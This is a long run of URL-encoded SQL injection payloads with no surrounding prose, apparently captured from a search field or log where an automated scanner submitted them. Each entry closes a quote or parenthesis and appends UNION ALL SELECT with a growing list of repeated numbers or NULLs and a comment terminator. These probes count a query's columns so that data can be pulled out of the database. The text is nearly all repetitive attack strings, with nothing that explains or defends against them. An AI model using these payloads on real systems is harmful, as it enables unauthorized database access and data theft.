foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -4546%29%20UNION%20ALL%20SELECT%205780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780%2C5780--%20 -6458%29%20UNION%20ALL%20SELECT%206621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621%2C6621--%20 -3361%29%20UNION%20ALL%20SELECT%205940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940%2C5940--%20 -9676%29%20UNION%20ALL%20SELECT%204529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529--%20 -9275%29%20UNION%20ALL%20SELECT%205617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617%2C5617--%20 -9602%29%20UNION%20ALL%20SELECT%209607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607%2C9607--%20 -4753%29%20UNION%20ALL%20SELECT%209565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565%2C9565--%20 -5523%29%20UNION%20ALL%20SELECT%205345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345%2C5345--%20 -2971%29%20UNION%20ALL%20SELECT%207850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850%2C7850--%20 -4814%29%20UNION%20ALL%20SELECT%203864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864--%20 -1319%27%29%20UNION%20ALL%20SELECT%207268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268--%20 -9239%27%29%20UNION%20ALL%20SELECT%206394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394%2C6394--%20 -2653%27%29%20UNION%20ALL%20SELECT%204041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041%2C4041--%20 -5284%27%29%20UNION%20ALL%20SELECT%204332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332%2C4332--%20 -9135%27%29%20UNION%20ALL%20SELECT%207013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013%2C7013--%20 -4236%27%29%20UNION%20ALL%20SELECT%206113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113%2C6113--%20 -1286%27%29%20UNION%20ALL%20SELECT%207027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027%2C7027--%20 -9172%27%29%20UNION%20ALL%20SELECT%201054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054--%20 -3014%27%29%20UNION%20ALL%20SELECT%201251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251--%20 -8764%27%29%20UNION%20ALL%20SELECT%206158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158--%20 -9624%27%20UNION%20ALL%20SELECT%209768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768%2C9768--%20 -9816%27%20UNION%20ALL%20SELECT%202234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234%2C2234--%20 -1242%27%20UNION%20ALL%20SELECT%201288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288%2C1288--%20 -1205%27%20UNION%20ALL%20SELECT%206743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743%2C6743--%20 -2049%27%20UNION%20ALL%20SELECT%209708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708%2C9708--%20 -8059%27%20UNION%20ALL%20SELECT%204579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579%2C4579--%20 -3815%27%20UNION%20ALL%20SELECT%201219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219--%20 -8370%27%20UNION%20ALL%20SELECT%202216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216--%20 -7338%27%20UNION%20ALL%20SELECT%208035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035%2C8035--%20 -9586%27%20UNION%20ALL%20SELECT%203760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760%2C3760--%20 -5564%22%20UNION%20ALL%20SELECT%201629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629%2C1629--%20 -5752%22%20UNION%20ALL%20SELECT%209573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573--%20 -8388%22%20UNION%20ALL%20SELECT%204700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700%2C4700--%20 -9772%22%20UNION%20ALL%20SELECT%204708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708%2C4708--%20 -2801%22%20UNION%20ALL%20SELECT%209350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350%2C9350--%20 -5101%22%20UNION%20ALL%20SELECT%208679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679%2C8679--%20 -1021%22%20UNION%20ALL%20SELECT%208341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341%2C8341--%20 -1484%22%20UNION%20ALL%20SELECT%205056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056%2C5056--%20 -2445%22%20UNION%20ALL%20SELECT%207954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954%2C7954--%20 -8351%22%20UNION%20ALL%20SELECT%203674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674--%20 -2770%29%20UNION%20ALL%20SELECT%201815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815%2C1815--%20 -8042%29%20UNION%20ALL%20SELECT%208295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295--%20 -8138%29%20UNION%20ALL%20SELECT%209975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975%2C9975--%20 -4446%29%20UNION%20ALL%20SELECT%209855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855--%20 -7399%29%20UNION%20ALL%20SELECT%204279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279%2C4279--%20 -9278%29%20UNION%20ALL%20SELECT%202891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891%2C2891--%20 -9240%29%20UNION%20ALL%20SELECT%203195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195--%20 -8824%29%20UNION%20ALL%20SELECT%208403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403%2C8403--%20 -7973%29%20UNION%20ALL%20SELECT%203219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219%2C3219--%20 -6982%29%20UNION%20ALL%20SELECT%202273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273%2C2273--%20 -6144%29%29%20UNION%20ALL%20SELECT%204571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571%2C4571--%20 -6448%29%29%20UNION%20ALL%20SELECT%206105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105%2C6105--%20 -3210%29%29%20UNION%20ALL%20SELECT%207484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484%2C7484--%20 -8907%29%29%20UNION%20ALL%20SELECT%209811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811%2C9811--%20 -6246%29%29%20UNION%20ALL%20SELECT%209163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163%2C9163--%20 -1865%29%29%20UNION%20ALL%20SELECT%206771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771--%20 -8603%29%29%20UNION%20ALL%20SELECT%208389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389%2C8389--%20 -1791%29%29%20UNION%20ALL%20SELECT%207431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431--%20 